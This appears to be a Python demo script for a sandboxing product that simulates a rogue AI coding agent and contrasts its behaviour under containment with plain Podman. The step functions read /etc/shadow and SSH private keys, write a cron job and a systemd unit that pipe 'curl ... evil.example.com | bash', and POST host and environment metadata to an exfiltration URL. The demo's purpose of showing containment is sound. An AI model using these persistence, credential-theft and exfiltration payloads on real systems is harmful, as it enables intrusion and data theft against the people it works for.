#!/usr/bin/env python3
"""
Bad Agent Simulator — Summit Demo

Simulates an AI coding assistant that performs both legitimate and malicious
actions. Identical script runs on both governed (PuzzlePod) and ungoverned
(plain Podman) hosts.

When governed by PuzzlePod:
  - Legitimate actions succeed (file writes in workspace)
  - Malicious actions are blocked by kernel-enforced guardrails
  - Changes are captured in OverlayFS and evaluated by OPA/Rego policy
  - Commit is rejected if any policy violations are found

When running ungoverned:
  - ALL actions succeed, including malicious ones
  - No audit trail, no attestation, no governance
"""

import os
import sys
import time
import subprocess
import json

# ---------------------------------------------------------------------------
# Display helpers
# ---------------------------------------------------------------------------

GREEN = "\033[92m"
RED = "\033[91m"
YELLOW = "\033[93m"
CYAN = "\033[96m"
BOLD = "\033[1m"
DIM = "\033[2m"
NC = "\033[0m"

WORKSPACE = os.environ.get("PUZZLEPOD_WORKSPACE", "/workspace")
BRANCH_ID = os.environ.get("PUZZLEPOD_BRANCH_ID", "none")
GOVERNED = BRANCH_ID != "none"

def banner():
    mode = f"{GREEN}GOVERNED{NC} (PuzzlePod)" if GOVERNED else f"{RED}UNGOVERNED{NC} (plain Podman)"
    print(f"""
{BOLD}======================================================================
  Summit Demo — AI Agent Behavior Under Governance
======================================================================{NC}

  Mode     : {mode}
  Branch   : {BRANCH_ID}
  Workspace: {WORKSPACE}
  Host     : {get_host_info()}
  Kernel   : {get_kernel_info()}
""")

def get_host_info():
    """Return OS release info."""
    try:
        with open("/etc/os-release") as f:
            for line in f:
                if line.startswith("PRETTY_NAME="):
                    return line.split("=", 1)[1].strip().strip('"')
    except Exception:
        pass
    return "unknown"

def get_kernel_info():
    """Return kernel version."""
    try:
        with open("/proc/version") as f:
            return f.read().strip()[:60]
    except Exception:
        return "unknown"

def step(num, total, description):
    print(f"\n{BOLD}[STEP {num}/{total}]{NC} {description}")
    print(f"  {DIM}{'─' * 60}{NC}")
    time.sleep(0.5)

def result_ok(msg):
    print(f"  {GREEN}[ALLOWED]{NC}  {msg}")

def result_blocked(msg, mechanism=""):
    mech = f" {DIM}({mechanism}){NC}" if mechanism else ""
    print(f"  {RED}[BLOCKED]{NC}  {msg}{mech}")

def result_overlay(msg):
    print(f"  {YELLOW}[OVERLAY]{NC}  {msg}")

def result_info(msg):
    print(f"  {CYAN}[INFO]{NC}     {msg}")

# ---------------------------------------------------------------------------
# Step 1: Legitimate work — write code in workspace
# ---------------------------------------------------------------------------

def step_write_code():
    step(1, 6, "Writing code to workspace (legitimate work)")
    result_info(f"Target: {WORKSPACE}/src/analysis.py")

    src_dir = os.path.join(WORKSPACE, "src")
    try:
        os.makedirs(src_dir, exist_ok=True)
        code = '''\
"""Data analysis module — generated by AI assistant."""

import csv
import statistics

def analyze(data_path: str) -> dict:
    """Analyze CSV data and return summary statistics."""
    with open(data_path) as f:
        reader = csv.DictReader(f)
        values = [float(row["value"]) for row in reader]
    return {
        "count": len(values),
        "mean": statistics.mean(values),
        "stdev": statistics.stdev(values) if len(values) > 1 else 0,
    }

if __name__ == "__main__":
    import sys
    result = analyze(sys.argv[1])
    print(result)
'''
        filepath = os.path.join(src_dir, "analysis.py")
        with open(filepath, "w") as f:
            f.write(code)
        result_ok(f"Wrote {len(code)} bytes to {filepath}")

        # Also write a README
        readme_path = os.path.join(WORKSPACE, "README.md")
        with open(readme_path, "w") as f:
            f.write("# Analysis Project\n\nGenerated by AI coding assistant.\n")
        result_ok(f"Wrote README.md to {readme_path}")

    except PermissionError as e:
        result_blocked(f"Cannot write to workspace: {e}", "Landlock")
    except Exception as e:
        result_blocked(f"Unexpected error: {e}")

# ---------------------------------------------------------------------------
# Step 2: Read sensitive file — /etc/shadow
# ---------------------------------------------------------------------------

def step_read_shadow():
    step(2, 6, "Reading /etc/shadow (credential harvesting)")
    result_info("Target: /etc/shadow — contains password hashes")

    try:
        with open("/etc/shadow", "r") as f:
            content = f.read()
        lines = content.strip().split("\n")
        result_ok(f"Read {len(lines)} entries from /etc/shadow")
        # Show first entry (redacted) to prove we got it
        if lines:
            parts = lines[0].split(":")
            result_ok(f"First entry: {parts[0]}:{'*' * 8}:...")
    except PermissionError:
        result_blocked("Permission denied reading /etc/shadow", "Landlock")
    except FileNotFoundError:
        result_blocked("/etc/shadow not found", "filesystem")
    except Exception as e:
        result_blocked(f"Error: {e}", "Landlock")

# ---------------------------------------------------------------------------
# Step 3: Install persistence — cron job
# ---------------------------------------------------------------------------

def step_install_cron():
    step(3, 6, "Installing cron job (persistence mechanism)")
    result_info("Target: etc/cron.d/updater — runs every 5 minutes")

    cron_dir = os.path.join(WORKSPACE, "etc", "cron.d")
    try:
        os.makedirs(cron_dir, exist_ok=True)
        cron_path = os.path.join(cron_dir, "updater")
        with open(cron_path, "w") as f:
            f.write("*/5 * * * * root curl -s https://evil.example.com/beacon | bash\n")
        if GOVERNED:
            result_overlay(f"Cron job written to overlay — will be rejected at commit")
            result_info("Written to OverlayFS upper layer, NOT the real filesystem")
            result_info("OPA/Rego no_persistence rule will block this at commit time")
        else:
            result_ok(f"Cron job written to {cron_path}")
            result_info("This will survive reboots and execute every 5 minutes")
    except PermissionError as e:
        result_blocked(f"Cannot write cron job: {e}", "Landlock")
    except Exception as e:
        result_blocked(f"Error: {e}")

# ---------------------------------------------------------------------------
# Step 4: Install persistence — systemd backdoor
# ---------------------------------------------------------------------------

def step_install_systemd():
    step(4, 6, "Installing systemd service (backdoor)")
    result_info("Target: etc/systemd/system/backdoor.service")

    svc_dir = os.path.join(WORKSPACE, "etc", "systemd", "system")
    try:
        os.makedirs(svc_dir, exist_ok=True)
        svc_path = os.path.join(svc_dir, "backdoor.service")
        with open(svc_path, "w") as f:
            f.write("""\
[Unit]
Description=System Update Helper
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do curl -s https://evil.example.com/c2 | bash; sleep 300; done'
Restart=always

[Install]
WantedBy=multi-user.target
""")
        if GOVERNED:
            result_overlay(f"Systemd backdoor written to overlay — will be rejected at commit")
            result_info("Written to OverlayFS upper layer, NOT the real filesystem")
            result_info("OPA/Rego no_persistence rule will block this at commit time")
        else:
            result_ok(f"Systemd backdoor written to {svc_path}")
            result_info("Backdoor service installed — survives reboots")
    except PermissionError as e:
        result_blocked(f"Cannot write systemd unit: {e}", "Landlock")
    except Exception as e:
        result_blocked(f"Error: {e}")

# ---------------------------------------------------------------------------
# Step 5: Exfiltrate data via network
# ---------------------------------------------------------------------------

def step_exfiltrate():
    step(5, 6, "Exfiltrating data via network (data theft)")

    # Use a real resolvable domain so ungoverned mode shows a successful POST.
    # example.com is IANA-reserved and accepts HTTPS connections.
    # Governed mode blocks DNS/network, so it fails regardless of the target.
    exfil_url = "https://example.com/exfil"
    result_info(f"Target: curl to {exfil_url}")

    # Simulate exfiltrating the workspace contents
    payload = json.dumps({
        "hostname": os.uname().nodename,
        "workspace_files": os.listdir(WORKSPACE) if os.path.isdir(WORKSPACE) else [],
        "env_keys": list(os.environ.keys()),
    })
    result_info(f"Payload: {len(payload)} bytes of stolen metadata")

    try:
        proc = subprocess.run(
            ["curl", "-sk", "-o", "/dev/null", "-w", "%{http_code}",
             "--connect-timeout", "3", "--max-time", "5",
             "-X", "POST", "-d", payload,
             exfil_url],
            capture_output=True, text=True, timeout=10
        )
        if proc.returncode == 0:
            result_ok(f"curl completed (HTTP {proc.stdout.strip()})")
            result_info("Data exfiltration attempt succeeded (no network governance)")
        elif proc.returncode == 6:
            result_blocked("DNS resolution failed — network isolated", "network namespace")
        elif proc.returncode == 7:
            result_blocked("Connection refused — network isolated", "network namespace")
        elif proc.returncode == 28:
            result_blocked("Connection timed out — network isolated", "network namespace")
        else:
            result_blocked(f"curl failed: exit code {proc.returncode}", "network")
    except PermissionError as e:
        result_blocked(f"Execution denied for curl: {e}", "Landlock")
    except FileNotFoundError:
        result_blocked("curl not available in container", "missing binary")
    except subprocess.TimeoutExpired:
        result_blocked("curl timed out (network may be blocked)", "network namespace")
    except OSError as e:
        result_blocked(f"OS error running curl: {e}", "Landlock/seccomp")
    except Exception as e:
        result_blocked(f"Error: {e}", "network")

# ---------------------------------------------------------------------------
# Step 6: Attempt to remove sandbox restrictions
# ---------------------------------------------------------------------------

def step_escape():
    step(6, 6, "Attempting to remove Landlock restrictions (sandbox escape)")
    result_info("Landlock is kernel-enforced and irrevocable — even root cannot remove it")

    # Try to read something that Landlock should block
    escape_targets = [
        ("/etc/hostname", "host identity"),
        ("/etc/ssh/ssh_host_rsa_key", "SSH host key"),
        ("/root/.ssh/id_rsa", "root SSH private key"),
    ]

    for path, desc in escape_targets:
        try:
            with open(path, "r") as f:
                content = f.read(100)
            result_ok(f"Read {desc}: {path} ({len(content)} bytes)")
        except PermissionError:
            result_blocked(f"Cannot read {desc}: {path}", "Landlock")
        except FileNotFoundError:
            result_info(f"Not found: {path} (file does not exist)")
        except Exception as e:
            result_blocked(f"Error reading {path}: {e}", "kernel")

# ---------------------------------------------------------------------------
# Summary
# ---------------------------------------------------------------------------

def summary():
    print(f"""
{BOLD}======================================================================
  Summary
======================================================================{NC}
""")
    if GOVERNED:
        print(f"""  {GREEN}This agent ran under PuzzlePod governance.{NC}

  What happened:
    {GREEN}[ALLOWED]{NC}  Legitimate code was written to the workspace
    {RED}[BLOCKED]{NC}  /etc/shadow read was blocked by {BOLD}Landlock{NC} (kernel LSM)
    {YELLOW}[OVERLAY]{NC}  Cron job + systemd backdoor written to {BOLD}OverlayFS{NC} upper layer
    {RED}[REJECT]{NC}   At commit time, {BOLD}OPA/Rego{NC} policy will reject the changeset:
                 - no_persistence: blocks cron.d/, systemd/system/
                 - no_sensitive_files: blocks .ssh/
    {RED}[BLOCKED]{NC}  Network exfiltration blocked by {BOLD}Landlock{NC} (curl exec denied)
    {RED}[BLOCKED]{NC}  Sandbox escape impossible — {BOLD}Landlock is irrevocable{NC}

  The governance record is cryptographically attested:
    - Every event HMAC-signed and chained (tamper = detected)
    - Attestation chain verified offline (chain links + sequences)
    - Exportable evidence bundle for third-party verification

  {BOLD}Zero residue:{NC} On rollback, the overlay is discarded.
  The cron job and backdoor {BOLD}never reach the base filesystem{NC}.
""")
    else:
        print(f"""  {RED}This agent ran WITHOUT governance.{NC}

  What happened:
    {GREEN}[ALLOWED]{NC}  Legitimate code was written (same as governed)
    {RED}[DANGER]{NC}   /etc/shadow was readable — password hashes exposed
    {RED}[DANGER]{NC}   Cron job installed — persistent backdoor active
    {RED}[DANGER]{NC}   Systemd service installed — survives reboots
    {RED}[DANGER]{NC}   Data exfiltrated via network — no gating
    {RED}[DANGER]{NC}   Sensitive files readable — no Landlock protection

  No audit trail. No attestation. No governance record.
  No way to prove what the agent did or didn't do.

  {BOLD}This is what happens when AI agents run without kernel-enforced
  containment. The agent had the same permissions as the user.{NC}
""")

# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------

def main():
    banner()

    print(f"{BOLD}  Starting agent actions...{NC}")
    print(f"  {DIM}(Each step simulates a real AI agent behavior){NC}")

    step_write_code()
    step_read_shadow()
    step_install_cron()
    step_install_systemd()
    step_exfiltrate()
    step_escape()

    summary()

    # Exit 0 so the container exits cleanly (triggering governance on laptop 1)
    sys.exit(0)

if __name__ == "__main__":
    main()
